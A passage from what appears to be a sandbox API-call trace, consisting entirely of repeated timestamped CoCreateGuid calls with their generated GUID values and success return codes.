Data3=0x4456, Data4=([0]=0x8d, [1]=0x1a, [2]=0x78, [3]=0xdd, [4]=0x1b, [5]=0x8f, [6]=0xe4, [7]=0xf3))) returned 0x0 [0244.172] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x1c2a0b23, Data2=0x27db, Data3=0x4cc7, Data4=([0]=0x9f, [1]=0xa7, [2]=0xf3, [3]=0x2e, [4]=0x29, [5]=0x7b, [6]=0xe8, [7]=0xb7))) returned 0x0 [0244.178] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x9352df77, Data2=0xcdb1, Data3=0x4e0d, Data4=([0]=0xa4, [1]=0x7b, [2]=0xac, [3]=0x65, [4]=0x36, [5]=0x7f, [6]=0x71, [7]=0x69))) returned 0x0 [0244.184] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xaa59ca71, Data2=0x9d89, Data3=0x4b24, Data4=([0]=0x94, [1]=0x22, [2]=0xf8, [3]=0x53, [4]=0xaa, [5]=0x72, [6]=0xc3, [7]=0xe8))) returned 0x0 [0244.189] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xe2ac8322, Data2=0x5d03, Data3=0x43e7, Data4=([0]=0x8c, [1]=0x67, [2]=0x11, [3]=0xdc, [4]=0x38, [5]=0xd9, [6]=0x99, [7]=0x4f))) returned 0x0 [0244.189] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x8e73b154, Data2=0xcc33, Data3=0x4b96, Data4=([0]=0x81, [1]=0xed, [2]=0xc0, [3]=0x4, [4]=0x78, [5]=0x2b, [6]=0xe2, [7]=0x12))) returned 0x0 [0244.278] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x938dd90e, Data2=0xf70, Data3=0x4a65, Data4=([0]=0x8a, [1]=0xb9, [2]=0xb0, [3]=0x0, [4]=0x4e, [5]=0x3d, [6]=0xdc, [7]=0xc9))) returned 0x0 [0244.283] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbee1d581, Data2=0x323b, Data3=0x43ae, Data4=([0]=0xb4, [1]=0xd6, [2]=0x3c, [3]=0xfe, [4]=0xd5, [5]=0x30, [6]=0xc3, [7]=0xa6))) returned 0x0 [0244.284] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x51e214dc, Data2=0x6485, Data3=0x4af6, Data4=([0]=0xb2, [1]=0x5a, [2]=0xd2, [3]=0x95, [4]=0xf7, [5]=0x21, [6]=0x55, [7]=0xb4))) returned 0x0 [0244.285] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x694210d5, Data2=0x1f09, Data3=0x40ab, Data4=([0]=0x9e, [1]=0xcf, [2]=0x9c, [3]=0x4c, [4]=0x1e, [5]=0xc3, [6]=0xcb, [7]=0x19))) returned 0x0 [0244.285] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7425c31f, Data2=0x13c9, Data3=0x4f6d, Data4=([0]=0xb1, [1]=0x15, [2]=0x9f, [3]=0xda, [4]=0x5a, [5]=0xb6, [6]=0x3c, [7]=0xaf))) returned 0x0 [0244.291] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x2918c50a, Data2=0x6fb3, Data3=0x48db, Data4=([0]=0xa0, [1]=0xa7, [2]=0xe7, [3]=0x39, [4]=0xbb, [5]=0xe1, [6]=0xd4, [7]=0x31))) returned 0x0 [0244.296] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x2ee43ead, Data2=0xa115, Data3=0x4803, Data4=([0]=0x9e, [1]=0x2c, [2]=0x97, [3]=0x96, [4]=0xe8, [5]=0xf7, [6]=0xc1, [7]=0x53))) returned 0x0 [0244.301] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xcc5b171d, Data2=0xfcd7, Data3=0x4716, Data4=([0]=0xab, [1]=0x98, [2]=0xbd, [3]=0xd7, [4]=0x2d, [5]=0x0, [6]=0x85, [7]=0x1d))) returned 0x0 [0244.301] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb26c137e, Data2=0xbed7, Data3=0x4aa2, Data4=([0]=0x9a, [1]=0x9, [2]=0x4d, [3]=0xd2, [4]=0xd2, [5]=0x50, [6]=0x8a, [7]=0x85))) returned 0x0 [0244.306] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xaf2bc2a9, Data2=0x6709, Data3=0x45f9, Data4=([0]=0xa3, [1]=0xeb, [2]=0xcd, [3]=0x3a, [4]=0x9c, [5]=0x42, [6]=0x78, [7]=0xe0))) returned 0x0 [0244.306] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xdd8e1dbe, Data2=0x5277, Data3=0x4fc8, Data4=([0]=0xa9, [1]=0xe1, [2]=0x44, [3]=0x71, [4]=0xb5, [5]=0x42, [6]=0x77, [7]=0x95))) returned 0x0 [0244.312] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x2bae74ca, Data2=0x2984, Data3=0x4e31, Data4=([0]=0xb1, [1]=0xee, [2]=0x26, [3]=0xd0, [4]=0xce, [5]=0x6c, [6]=0x8, [7]=0x55))) returned 0x0 [0244.312] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x20e5b3b4, Data2=0x85a1, Data3=0x4f5e, Data4=([0]=0x94, [1]=0xe, [2]=0x31, [3]=0x22, [4]=0x34, [5]=0xf1, [6]=0xff, [7]=0x4b))) returned 0x0 [0244.312] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7ca2e584, Data2=0xcada, Data3=0x48c2, Data4=([0]=0xa7, [1]=0xe7, [2]=0x78, [3]=0x72, [4]=0x2f, [5]=0xe2, [6]=0x60, [7]=0xb5))) returned 0x0 [0244.366] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xfd3200fb, Data2=0x365d, Data3=0x44b0, Data4=([0]=0x90, [1]=0x55, [2]=0xad, [3]=0xa5, [4]=0x46, [5]=0xee, [6]=0x89, [7]=0x3e))) returned 0x0 [0244.370] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x53094d12, Data2=0x9470, Data3=0x4aa4, Data4=([0]=0x8b, [1]=0x90, [2]=0xb9, [3]=0x9e, [4]=0x4f, [5]=0x53, [6]=0x15, [7]=0x9b))) returned 0x0 [0244.375] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x48596514, Data2=0x7f98, Data3=0x4a12, Data4=([0]=0xa3, [1]=0x7e, [2]=0xe0, [3]=0x5f, [4]=0x41, [5]=0x7a, [6]=0x33, [7]=0x81))) returned 0x0 [0244.376] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc0b2350e, Data2=0xfc90, Data3=0x4b87, Data4=([0]=0x95, [1]=0x8c, [2]=0xe4, [3]=0x8b, [4]=0xc1, [5]=0x4, [6]=0x11, [7]=0xf6))) returned 0x0 [0244.382] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb0431a60, Data2=0x21d4, Data3=0x4788, Data4=([0]=0xac, [1]=0x44, [2]=0xcb, [3]=0x81, [4]=0xb2, [5]=0x20, [6]=0x64, [7]=0x5d))) returned 0x0 [0244.387] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc5fc59ff, Data2=0x54d4, Data3=0x4270, Data4=([0]=0x97, [1]=0x8d, [2]=0xf5, [3]=0xd3, [4]=0x6c, [5]=0xc4, [6]=0x9e, [7]=0x7c))) returned 0x0 [0244.392] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x25b5c5d5, Data2=0xd260, Data3=0x4c68, Data4=([0]=0x97, [1]=0x87, [2]=0x7a, [3]=0x81, [4]=0xf9, [5]=0xcf, [6]=0x28, [7]=0xc))) returned 0x0 [0244.393] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x94fd28c, Data2=0xde93, Data3=0x4cb2, Data4=([0]=0x80, [1]=0x3f, [2]=0x50, [3]=0xd8, [4]=0x26, [5]=0x5d, [6]=0x56, [7]=0xbd))) returned 0x0 [0244.395] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbf088915, Data2=0xd3e8, Data3=0x48e4, Data4=([0]=0x8b, [1]=0x6a, [2]=0xcf, [3]=0xf1, [4]=0x18, [5]=0x14, [6]=0x75, [7]=0x6))) returned 0x0 [0244.400] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa1c5351, Data2=0x6b29, Data3=0x49c3, Data4=([0]=0x9d, [1]=0x70, [2]=0xd1, [3]=0x19, [4]=0xd9, [5]=0xa9, [6]=0x28, [7]=0xb0))) returned 0x0 [0244.404] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbf27356f, Data2=0x7926, Data3=0x4e20, Data4=([0]=0xa0, [1]=0x7d, [2]=0xcb, [3]=0x66, [4]=0x35, [5]=0x3, [6]=0x61, [7]=0xe6))) returned 0x0 [0244.565] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x770a99be, Data2=0xce5e, Data3=0x4622, Data4=([0]=0xb2, [1]=0x8b, [2]=0xe4, [3]=0xd5, [4]=0x2c, [5]=0xba, [6]=0xac, [7]=0x23))) returned 0x0 [0244.572] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa9af03b9, Data2=0x1949, Data3=0x43ee, Data4=([0]=0x9e, [1]=0x23, [2]=0x99, [3]=0x1f, [4]=0x25, [5]=0xd0, [6]=0x78, [7]=0xd))) returned 0x0 [0244.576] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbb5cf812, Data2=0x8357, Data3=0x4bf7, Data4=([0]=0x98, [1]=0x8, [2]=0x87, [3]=0xd9, [4]=0x44, [5]=0xc7, [6]=0xa7, [7]=0x44))) returned 0x0 [0244.582] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x73acb791, Data2=0x29b9, Data3=0x4e00, Data4=([0]=0xae, [1]=0x6b, [2]=0x6a, [3]=0x45, [4]=0x3d, [5]=0x8c, [6]=0x7e, [7]=0x24))) returned 0x0 [0244.583] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xeadd52e3, Data2=0xc24b, Data3=0x4842, Data4=([0]=0xa9, [1]=0xfc, [2]=0xcd, [3]=0x80, [4]=0xcf, [5]=0xb3, [6]=0x16, [7]=0xbb))) returned 0x0 [0244.584] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xeb671ea2, Data2=0x6e5c, Data3=0x439a, Data4=([0]=0x85, [1]=0xfc, [2]=0xdd, [3]=0xa0, [4]=0x2, [5]=0x26, [6]=0x24, [7]=0x1d))) returned 0x0 [0244.585] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x487a4380, Data2=0xca20, Data3=0x44dc, Data4=([0]=0xb5, [1]=0x6d, [2]=0xa4, [3]=0xe2, [4]=0x8c, [5]=0x17, [6]=0x1, [7]=0xae))) returned 0x0 [0244.586] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc4caa84d, Data2=0x6a06, Data3=0x4bc4, Data4=([0]=0xae, [1]=0xd8, [2]=0x9f, [3]=0x27, [4]=0x9a, [5]=0x92, [6]=0x87, [7]=0xe8))) returned 0x0 [0244.587] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc7069349, Data2=0x5124, Data3=0x494a, Data4=([0]=0xbc, [1]=0x43, [2]=0x12, [3]=0xb1, [4]=0xc, [5]=0x22, [6]=0xca, [7]=0x94))) returned 0x0 [0244.588] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x82aefc2f, Data2=0xd0d, Data3=0x4f3f, Data4=([0]=0xa4, [1]=0xa6, [2]=0xa1, [3]=0x5b, [4]=0xd8, [5]=0x73, [6]=0xf3, [7]=0x8e))) returned 0x0 [0244.589] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xe3c11188, Data2=0x4e7, Data3=0x4479, Data4=([0]=0x99, [1]=0x4b, [2]=0x22, [3]=0x32, [4]=0x45, [5]=0x74, [6]=0x48, [7]=0x96))) returned 0x0 [0244.590] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc9b32632, Data2=0x8ef5, Data3=0x4397, Data4=([0]=0xb4, [1]=0xe3, [2]=0xba, [3]=0xfe, [4]=0x49, [5]=0x78, [6]=0x8f, [7]=0x7e))) returned 0x0 [0244.590] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x92ba9e2c, Data2=0xf4c8, Data3=0x41ae, Data4=([0]=0x8e, [1]=0x62, [2]=0x2d, [3]=0xbd, [4]=0xbb, [5]=0xca, [6]=0xf8, [7]=0xf3))) returned 0x0 [0244.591] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x9cab0bf, Data2=0x28b1, Data3=0x41de, Data4=([0]=0x8a, [1]=0x62, [2]=0xaa, [3]=0xa2, [4]=0x77, [5]=0x1, [6]=0x22, [7]=0xd))) returned 0x0 [0244.592] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x39d4ab34, Data2=0x4a68, Data3=0x40ec, Data4=([0]=0xad, [1]=0xd5, [2]=0x58, [3]=0x27, [4]=0xbe, [5]=0x85, [6]=0x20, [7]=0x2c))) returned 0x0 [0244.593] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x1ab2f5ad, Data2=0x5798, Data3=0x4f02, Data4=([0]=0xb9, [1]=0x9c, [2]=0x28, [3]=0x56, [4]=0x9d, [5]=0x1f, [6]=0x86, [7]=0x23))) returned 0x0 [0244.594] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x1f5f98f6, Data2=0x8f36, Data3=0x43cc, Data4=([0]=0x83, [1]=0xec, [2]=0xcf, [3]=0x25, [4]=0x5c, [5]=0x33, [6]=0x2c, [7]=0xac))) returned 0x0 [0244.595] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x5e71224a, Data2=0x93c9, Data3=0x4d1d, Data4=([0]=0x9a, [1]=0x4a, [2]=0xdf, [3]=0x8, [4]=0xb8, [5]=0xa0, [6]=0x4c, [7]=0x99))) returned 0x0 [0244.595] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6878a546, Data2=0xd406, Data3=0x4d85, Data4=([0]=0x89, [1]=0x98, [2]=0x85, [3]=0x25, [4]=0xb0, [5]=0x9d, [6]=0x93, [7]=0x8d))) returned 0x0 [0244.596] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x9ba3b9e5, Data2=0x5cb8, Data3=0x4025, Data4=([0]=0xa5, [1]=0x72, [2]=0xd8, [3]=0x1b, [4]=0xc8, [5]=0x20, [6]=0xd2, [7]=0x84))) returned 0x0 [0244.606] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xdb7653b1, Data2=0xafe5, Data3=0x471c, Data4=([0]=0xb6, [1]=0xda, [2]=0xa3, [3]=0x2c, [4]=0x43, [5]=0xfa, [6]=0xef, [7]=0xca))) returned 0x0 [0244.607] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x1a62a552, Data2=0x35d3, Data3=0x48b5, Data4=([0]=0x87, [1]=0x79, [2]=0xee, [3]=0xb4, [4]=0x6, [5]=0x81, [6]=0xef, [7]=0xbd))) returned 0x0 [0244.607] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x62cd6e51, Data2=0x723a, Data3=0x43d4, Data4=([0]=0x88, [1]=0xe, [2]=0x4, [3]=0x19, [4]=0x98, [5]=0x20, [6]=0x7a, [7]=0x7))) returned 0x0 [0244.608] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x41a52aa4, Data2=0x632b, Data3=0x450d, Data4=([0]=0x8c, [1]=0x1, [2]=0xec, [3]=0x27, [4]=0x4e, [5]=0xd1, [6]=0xd4, [7]=0x9d))) returned 0x0 [0244.609] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbe8f0569, Data2=0x48d3, Data3=0x46f6, Data4=([0]=0x92, [1]=0x49, [2]=0xb2, [3]=0x8e, [4]=0x2, [5]=0x48, [6]=0x93, [7]=0x81))) returned 0x0 [0244.609] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6c2f130d, Data2=0x571, Data3=0x4814, Data4=([0]=0xa8, [1]=0x4e, [2]=0xaa, [3]=0xd6, [4]=0x82, [5]=0xf9, [6]=0x86, [7]=0x35))) returned 0x0 [0244.610] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x5b523963, Data2=0x1878, Data3=0x4fa6, Data4=([0]=0x99, [1]=0x63, [2]=0xc7, [3]=0xdd, [4]=0x4c, [5]=0xc5, [6]=0xda, [7]=0x32))) returned 0x0 [0244.611] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xba31dda1, Data2=0xf0e0, Data3=0x41af, Data4=([0]=0x8f, [1]=0x23, [2]=0x41, [3]=0x5f, [4]=0x1a, [5]=0x9c, [6]=0xd3, [7]=0xac))) returned 0x0 [0244.611] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x5d920294, Data2=0x504, Data3=0x434a, Data4=([0]=0x80, [1]=0xe7, [2]=0xd0, [3]=0x7d, [4]=0xfb, [5]=0xae, [6]=0xdd, [7]=0xeb))) returned 0x0 [0244.612] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x42d73891, Data2=0xaa0d, Data3=0x4441, Data4=([0]=0xb7, [1]=0x7a, [2]=0x16, [3]=0x3a, [4]=0x12, [5]=0xb1, [6]=0xcd, [7]=0x99))) returned 0x0 [0244.612] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbd081250, Data2=0x2c4d, Data3=0x43e8, Data4=([0]=0x97, [1]=0xd7, [2]=0x11, [3]=0x22, [4]=0xac, [5]=0x9f, [6]=0x3a, [7]=0xd))) returned 0x0 [0244.613] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x8b2a70aa, Data2=0xa55b, Data3=0x40bd, Data4=([0]=0xa2, [1]=0x8f, [2]=0x2c, [3]=0x39, [4]=0xef, [5]=0x72, [6]=0xb5, [7]=0xa1))) returned 0x0 [0244.613] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x45e264aa, Data2=0x818d, Data3=0x48ba, Data4=([0]=0xb5, [1]=0xa5, [2]=0x9e, [3]=0x22, [4]=0xfa, [5]=0x8a, [6]=0x23, [7]=0xfd))) returned 0x0 [0244.614] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x6da1b365, Data2=0x422a, Data3=0x49bf, Data4=([0]=0x80, [1]=0x95, [2]=0xb6, [3]=0x62, [4]=0xd, [5]=0xb3, [6]=0x53, [7]=0xb1))) returned 0x0 [0244.615] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x88ec19e7, Data2=0xdb36, Data3=0x4772, Data4=([0]=0x8c, [1]=0x6d, [2]=0x2d, [3]=0x1a, [4]=0xee, [5]=0x6b, [6]=0x97, [7]=0xfa))) returned 0x0 [0244.615] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x95a8d114, Data2=0xd024, Data3=0x42de, Data4=([0]=0x81, [1]=0x39, [2]=0xea, [3]=0x2b, [4]=0x7c, [5]=0x5, [6]=0x36, [7]=0xf3))) returned 0x0 [0244.616] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb63529a2, Data2=0x2dd1, Data3=0x49f9, Data4=([0]=0x91, [1]=0x58, [2]=0xfc, [3]=0x78, [4]=0xc3, [5]=0xaa, [6]=0x56, [7]=0x7f))) returned 0x0 [0244.616] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x439bc35, Data2=0x5104, Data3=0x48c1, Data4=([0]=0x8a, [1]=0xd7, [2]=0x51, [3]=0x54, [4]=0x63, [5]=0xe3, [6]=0x94, [7]=0x8a))) returned 0x0 [0244.617] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x51ea241a, Data2=0x6cba, Data3=0x445f, Data4=([0]=0xa1, [1]=0x68, [2]=0x47, [3]=0x64, [4]=0x6, [5]=0x4d, [6]=0xe1, [7]=0x70))) returned 0x0 [0244.618] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc5cfccb9, Data2=0xd2c6, Data3=0x4f49, Data4=([0]=0xac, [1]=0xe6, [2]=0xed, [3]=0xaa, [4]=0xd, [5]=0xfa, [6]=0x4, [7]=0x3))) returned 0x0 [0244.618] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xabd085e8, Data2=0x4248, Data3=0x40af, Data4=([0]=0xba, [1]=0x43, [2]=0xb9, [3]=0x3e, [4]=0xb9, [5]=0x83, [6]=0xb8, [7]=0x27))) returned 0x0 [0244.618] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x5c3ab134, Data2=0xe544, Data3=0x45ae, Data4=([0]=0x8b, [1]=0x99, [2]=0xba, [3]=0x30, [4]=0xab, [5]=0x32, [6]=0xab, [7]=0xb4))) returned 0x0 [0244.619] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x86c64f6d, Data2=0xdaf6, Data3=0x4227, Data4=([0]=0xbe, [1]=0x2d, [2]=0xf7, [3]=0xa7, [4]=0xcc, [5]=0xb0, [6]=0xac, [7]=0xe8))) returned 0x0 [0244.619] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbf8af903, Data2=0x5cdc, Data3=0x40d3, Data4=([0]=0x93, [1]=0x72, [2]=0x67, [3]=0x56, [4]=0x1c, [5]=0xf9, [6]=0x20, [7]=0xa3))) returned 0x0 [0244.663] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x4d2560e3, Data2=0x4d47, Data3=0x4ab8, Data4=([0]=0xb7, [1]=0x10, [2]=0x29, [3]=0x84, [4]=0x47, [5]=0xca, [6]=0x8a, [7]=0x6d))) returned 0x0 [0244.671] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb8f6eb5c, Data2=0x297f, Data3=0x4564, Data4=([0]=0x9f, [1]=0x57, [2]=0xf1, [3]=0xda, [4]=0x72, [5]=0xbc, [6]=0x69, [7]=0x57))) returned 0x0 [0244.680] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x2b259e89, Data2=0xd9f4, Data3=0x42f1, Data4=([0]=0xad, [1]=0xf9, [2]=0xb3, [3]=0x4e, [4]=0x30, [5]=0x92, [6]=0x11, [7]=0x5f))) returned 0x0 [0244.688] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7cab6769, Data2=0x50cf, Data3=0x48fe, Data4=([0]=0xb1, [1]=0x98, [2]=0xfa, [3]=0x91, [4]=0x91, [5]=0x7, [6]=0x84, [7]=0xf8))) returned 0x0 [0244.693] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x532ed1ba, Data2=0x7bd0, Data3=0x48ff, Data4=([0]=0x97, [1]=0xf4, [2]=0xe4, [3]=0xe6, [4]=0x4a, [5]=0x4a, [6]=0xa3, [7]=0x2d))) returned 0x0 [0244.699] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xe9430f24, Data2=0x367, Data3=0x4155, Data4=([0]=0x86, [1]=0x49, [2]=0xe9, [3]=0xf1, [4]=0xc2, [5]=0x4b, [6]=0xa9, [7]=0x65))) returned 0x0 [0244.702] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xdbad75e, Data2=0x923f, Data3=0x406b, Data4=([0]=0x92, [1]=0x49, [2]=0x17, [3]=0x95, [4]=0xba, [5]=0x34, [6]=0xa3, [7]=0x94))) returned 0x0 [0244.705] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc59fd551, Data2=0x8a98, Data3=0x4bc8, Data4=([0]=0x9d, [1]=0x61, [2]=0xdb, [3]=0x77, [4]=0x24, [5]=0x4f, [6]=0x3f, [7]=0xa))) returned 0x0 [0244.706] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xd01857b6, Data2=0xea65, Data3=0x4365, Data4=([0]=0xb8, [1]=0x15, [2]=0xa7, [3]=0x5, [4]=0xaa, [5]=0x50, [6]=0x14, [7]=0xeb))) returned 0x0 [0244.708] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xac7e6044, Data2=0x276f, Data3=0x404e, Data4=([0]=0xb0, [1]=0x43, [2]=0x53, [3]=0x6b, [4]=0x8c, [5]=0x63, [6]=0x2d, [7]=0x53))) returned 0x0 [0244.709] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xc5780e6b, Data2=0x1ce8, Data3=0x481b, Data4=([0]=0xa1, [1]=0x6e, [2]=0xcb, [3]=0xf4, [4]=0x35, [5]=0x9c, [6]=0xb7, [7]=0x92))) returned 0x0 [0244.710] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xeed4da, Data2=0x4e1, Data3=0x414a, Data4=([0]=0xbc, [1]=0x23, [2]=0x96, [3]=0xf, [4]=0xf0, [5]=0x15, [6]=0xe7, [7]=0xd1))) returned 0x0 [0244.711] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xeec345fc, Data2=0x29a6, Data3=0x496e, Data4=([0]=0xad, [1]=0x72, [2]=0x5b, [3]=0xf8, [4]=0x37, [5]=0x5, [6]=0x4a, [7]=0xf7))) returned 0x0 [0244.712] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xec58d5bd, Data2=0x7bcc, Data3=0x4257, Data4=([0]=0xb0, [1]=0xc, [2]=0x63, [3]=0x60, [4]=0xd3, [5]=0x48, [6]=0x5, [7]=0x4a))) returned 0x0 [0244.713] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x22e69432, Data2=0x3174, Data3=0x4fda, Data4=([0]=0xae, [1]=0xb5, [2]=0x84, [3]=0x98, [4]=0xbc, [5]=0x81, [6]=0x83, [7]=0xc5))) returned 0x0 [0244.714] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x96b2b5bf, Data2=0xbabe, Data3=0x4885, Data4=([0]=0xa2, [1]=0xc, [2]=0x37, [3]=0x82, [4]=0x18, [5]=0xef, [6]=0xd8, [7]=0xf0))) returned 0x0 [0244.714] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xfc2f067a, Data2=0x8317, Data3=0x41aa, Data4=([0]=0x84, [1]=0x72, [2]=0x35, [3]=0xa1, [4]=0xeb, [5]=0xa8, [6]=0xa5, [7]=0xc4))) returned 0x0 [0244.715] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7a15f169, Data2=0xd3e6, Data3=0x41b7, Data4=([0]=0xba, [1]=0xb9, [2]=0x23, [3]=0xf5, [4]=0x1f, [5]=0x3a, [6]=0x32, [7]=0x28))) returned 0x0 [0244.716] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x77a7934a, Data2=0x5398, Data3=0x4a9e, Data4=([0]=0xbf, [1]=0xc7, [2]=0x3a, [3]=0xa2, [4]=0x44, [5]=0xff, [6]=0xcc, [7]=0xbe))) returned 0x0 [0244.717] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xe91b243f, Data2=0x5262, Data3=0x435a, Data4=([0]=0x86, [1]=0xf6, [2]=0x55, [3]=0x8b, [4]=0x3, [5]=0x3, [6]=0x95, [7]=0x3b))) returned 0x0 [0244.718] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xbea82710, Data2=0x3dd9, Data3=0x422b, Data4=([0]=0x8d, [1]=0x8b, [2]=0x9b, [3]=0xa0, [4]=0x29, 